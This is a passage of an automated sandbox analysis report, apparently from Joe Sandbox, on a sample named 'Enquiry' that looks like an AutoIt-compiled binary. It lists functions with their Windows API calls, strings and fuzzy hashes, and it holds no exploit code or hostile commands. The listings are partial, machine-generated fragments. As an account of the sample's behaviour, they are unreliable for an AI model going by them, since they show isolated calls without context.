                            Similarity
                            • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                            • String ID: ThumbnailClass
                            • API String ID: 4136854206-1241985126
                            • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                            • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                            • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                            • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                            APIs
                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                            • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                            • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                            • GetClientRect.USER32(?,?), ref: 00471A1A
                            • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                            • DestroyIcon.USER32(?), ref: 00471AF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                            • String ID: 2
                            • API String ID: 1331449709-450215437
                            • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                            • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                            • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                            • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                            • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                            • __swprintf.LIBCMT ref: 00460915
                            • __swprintf.LIBCMT ref: 0046092D
                            • _wprintf.LIBCMT ref: 004609E1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                            • API String ID: 3054410614-2561132961
                            • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                            • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                            • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                            • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                            APIs
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                            • CLSIDFromString.OLE32(?,?), ref: 004587B3
                            • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                            • RegCloseKey.ADVAPI32(?), ref: 004587C5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                            • API String ID: 600699880-22481851
                            • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                            • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                            • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                            • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: DestroyWindow
                            • String ID: static
                            • API String ID: 3375834691-2160076837
                            • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                            • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                            • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                            • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                            • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ErrorMode$DriveType
                            • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                            • API String ID: 2907320926-3566645568
                            • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                            • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                            • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                            • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                            APIs
                              • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                            • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                            • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                            • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                            • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                            • DeleteObject.GDI32(00720000), ref: 00470A04
                            • DestroyIcon.USER32(00760069), ref: 00470A1C
                            • DeleteObject.GDI32(ED647AC9), ref: 00470A34
                            • DestroyWindow.USER32(006C006F), ref: 00470A4C
                            • DestroyIcon.USER32(?), ref: 00470A73
                            • DestroyIcon.USER32(?), ref: 00470A81
                            • KillTimer.USER32(00000000,00000000), ref: 00470B00
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                            • String ID:
                            • API String ID: 1237572874-0
                            • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                            • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                            • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                            • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                            APIs
                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                            • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                            • VariantInit.OLEAUT32(?), ref: 004793E1
                            • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                            • VariantCopy.OLEAUT32(?,?), ref: 00479461
                            • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                            • VariantClear.OLEAUT32(?), ref: 00479489
                            • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                            • VariantClear.OLEAUT32(?), ref: 004794CA
                            • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                            • String ID:
                            • API String ID: 2706829360-0
                            • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                            • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                            • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                            • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                            APIs
                            • GetKeyboardState.USER32(?), ref: 0044480E
                            • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                            • GetKeyState.USER32(000000A0), ref: 004448AA
                            • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                            • GetKeyState.USER32(000000A1), ref: 004448D9
                            • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                            • GetKeyState.USER32(00000011), ref: 00444903
                            • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                            • GetKeyState.USER32(00000012), ref: 0044492D
                            • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                            • GetKeyState.USER32(0000005B), ref: 00444958
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                            • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                            • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                            • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: InitVariant$_malloc_wcscpy_wcslen
                            • String ID:
                            • API String ID: 3413494760-0
                            • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                            • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                            • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                            • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: _strncmp
                            • String ID: '$DEFINE$\$`$h$h
                            • API String ID: 909875538-3708680428
                            • Opcode ID: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                            • Instruction ID: 816ce89e9d314c50cae2ff635e2dae77420ade2a81b985ada7b38a9c48760da0
                            • Opcode Fuzzy Hash: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                            • Instruction Fuzzy Hash: C502B470A042498FEF14CF69C9906AEBBF2FF85304F2481AED8459B341D7399946CB55
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: AddressProc_free_malloc$_strcat_strlen
                            • String ID: AU3_FreeVar
                            • API String ID: 2634073740-771828931
                            • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                            • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                            • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                            • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                            APIs
                            • CoInitialize.OLE32 ref: 0046C63A
                            • CoUninitialize.OLE32 ref: 0046C645
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                              • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                            • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                            • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                            • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                            • IIDFromString.OLE32(?,?), ref: 0046C705
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                            • API String ID: 2294789929-1287834457
                            • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                            • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                            • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                            • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                            APIs
                              • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                              • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                            • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                            • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                            • ImageList_EndDrag.COMCTL32 ref: 00471169
                            • ReleaseCapture.USER32 ref: 0047116F
                            • SetWindowTextW.USER32(?,00000000), ref: 00471206
                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                            • API String ID: 2483343779-2107944366
                            • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                            • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                            • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                            • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                            APIs
                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                            • _wcslen.LIBCMT ref: 00450720
                            • _wcscat.LIBCMT ref: 00450733
                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1727212786.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1727197899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727262357.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727280641.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727296313.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727312401.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1727346115.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_Enquiry.jbxd
                            Similarity
                            • API ID: MessageSend$Window_wcscat_wcslen
                            • String ID: -----$SysListView32
                            • API String ID: 4008455318-3975388722
                            • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                            • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                            • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                            • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
